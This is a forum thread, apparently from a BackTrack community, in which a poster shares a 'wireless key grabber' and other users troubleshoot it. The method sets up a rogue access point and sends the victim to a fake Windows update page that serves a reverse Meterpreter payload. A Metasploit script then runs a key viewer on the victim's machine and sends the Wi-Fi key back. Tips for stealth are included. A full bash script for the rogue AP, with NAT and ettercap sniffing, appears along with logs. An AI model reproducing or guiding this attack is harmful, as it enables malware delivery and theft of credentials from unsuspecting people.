I have simplified my previous tutorial on grabbing wireless keys
specially setup for backtrack 4,
here is the intro
rar file hereThis is a simplified tutorial for grabbing wireless keys from our victim, regardless of their wireless security. The theory is we create a fake access point, our victim connects, tries to surf the internet but gets redirected to our fake update page. Victim then downloads our “windows update” which is a reverse meterpreter exe. Metasploit then runs it script, uploads wireless key viewer, executes on victims computer, creates a random titled text file containing the pc’s wireless key, and uploads back to backtrack.
Crippled features :
Reverse meterpreter port set to 5555, to be stealthy we should choose another port
Windows update html (index.html), a very simplified page, to be stealthy you need to redesign
http://www.megaupload.com/?d=C5LDSQEE
readme at http://www.megaupload.com/?d=MM98S29W
cr1spyj0nes --- is this what you needed?
I'm sure we can automate the remainder,
edit , lots of views but no comments? does it work?
I will try it out but before that I need also to get your Fake AP project running.
Then I will understand this much more easier!
By the way have a look in my thread http://forums.remote-exploit.org/showthread.php?t=21134 I need some help over getting it to work.
Do I have to disable the DHCP service on my router ? This might be one of the reasons why It didn't work.
Check it and let me know beside !
Thank you!
Wireless key grabber - Backtrack 4
@hm2075
Thanks a lot for all ur tutorials so far.
I tried ur method in BT4 with partially success. The first issue i had was with the dhcp server. The client was connected but unable to obtain a valid IP. After some investigation it appeared to be an issue with the user groups of the dhcpd.
When i issued this command: # dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
It returned an error: Cannot create an entry /var/run/dhcpd.pid -- Permission denied.
To mitigate this I followed:
#vim /var/run/dhcpd.pid
#chgrp dhcpd /var/run/dhcpd.pid
#chown dhcpd /var/run/dhcpd.pid
Then i restarted the dhcp server and connected clients were able to get valid IPs.
The next issue I had was obtaining the key.
Once i was connected to the fake IP, downloaded and installed the file, however i was not able to receive the txt file with the wpa key. On the metasploit terminal it stuck for ages on: Uploading key....(Or something like that)
Any suggestions?
Regards
ZŁY$
are you sure you are using my wireless key grabber for backtrack 4 and not backtrack 3?
i see u have issued
dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
whereas u should have issued
/etc/init.d/dhcp3-server restart
if you are following the old tutorial then it may not work, follow this one and it should be fine
http://forums.remote-exploit.org/showthread.php?t=21144
can a mod merge with this thread please
http://forums.remote-exploit.org/showthread.php?t=21144
I definately used the correct grabber.
As I explained i had an issue with the dhcp, not issuing IPs once connected. By trying to restart the dhcp server with this command "/etc/init.d/dhcp3-server restart" it was displaying a "fail" error message. Hence my workaround to bypass this issue, which worked a treat.
However my issue was with the keygrabber not uploading back the key.
From the connected client i telnet back to my BT4 on port 5555 to see if a connection is established. As soon as i connected to the port i could see all that the registry values been transfered, and on the metasploit terminal a message appeared as "upload success", however no txt file was present on the BT4.
hmmm i m a bit puzzled....I ll give it another go with a different laptop.
(Pls note that the laptop i tried it on was of limited priviledges so i dont know if this pose any limitations.....)
I cannot post yet on the wireless section, thus my new thread in this section...
ah i see, didn't realise that you couldn't post in the wireless section,
looks like you almost got it to work, wkv uploaded and executed and victim's computer, just the key text file not downloaded,
open up the harvester.rb file and look at the coding in there, maybe you just need to amend the destination of the text file,
i can explain each line to you if you get stuck
hm2075 please can you upload rar file and readme file on somewhere else rather than megaupload
any suggestions?
Threads merged
"\x74\x68\x65\x70\x72\x65\x7a\x39\x38";
I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the pre-requisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
Attack PC:
RTL8187L USB adapter
Victim:
MS Vista
Intel 4965AGN
Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.
airebaseCode:#!/bin/bash echo -n "Enter the name of the interface connected to the internet, for example eth0: " read -e IFACE echo -n "Enter your wireless interface name, for example wlan0: " read -e WIFACE echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: " read -e ESSID kill `cat /var/run/dhcpd.pid` killall -9 dhcpd airbase-ng ettercap airmon-ng stop $WIFACE ifconfig $WIFACE down airmon-ng start $WIFACE modprobe tun konsole -e airbase-ng -e "$ESSID" -v $WIFACE & sleep 10 ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j MASQUERADE iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE echo > '/var/state/dhcp/dhcpd.leases' konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 & konsole -e ettercap -T -q -p -i at0 // // & sleep 8 echo "1" > /proc/sys/net/ipv4/ip_forward
EttercapCode:3:41:24 Got broadcast probe request from 00:18:DE:3C:FB:BF 13:41:24 Got broadcast probe request from 00:1D:E0:4F:B0:07 13:41:25 Got directed probe request from 00:1F:3B:00:F2:51 - "test1234" 13:41:25 Got an auth request from 00:1F:3B:00:F2:51 (open system) 13:41:25 Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234" 13:41:25 Got broadcast probe request from 00:18:DE:69:47:CD
Code:ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Listening on at0... (Ethernet) at0 -> 00:C0:CA:19:A0:8C 10.0.0.1 255.255.255.0 SSL dissection needs a valid 'redir_command_on' script in the etter.conf file Privileges dropped to UID 65534 GID 65534... <truncated> DHCP: [00:1F:3B:00:F2:51] DISCOVER DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222 DHCP: [00:1F:3B:00:F2:51] REQUEST 10.0.0.254 DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
DHCPD
Code:Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24 Sending on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24 Sending on Socket/fallback/fallback-net DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0 DHCPOFFER on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0 DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:1f:3b:00:f2:51 (victim) via at0 DHCPACK on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0 DHCPINFORM from 10.0.0.254 via at0
Posting Permissions
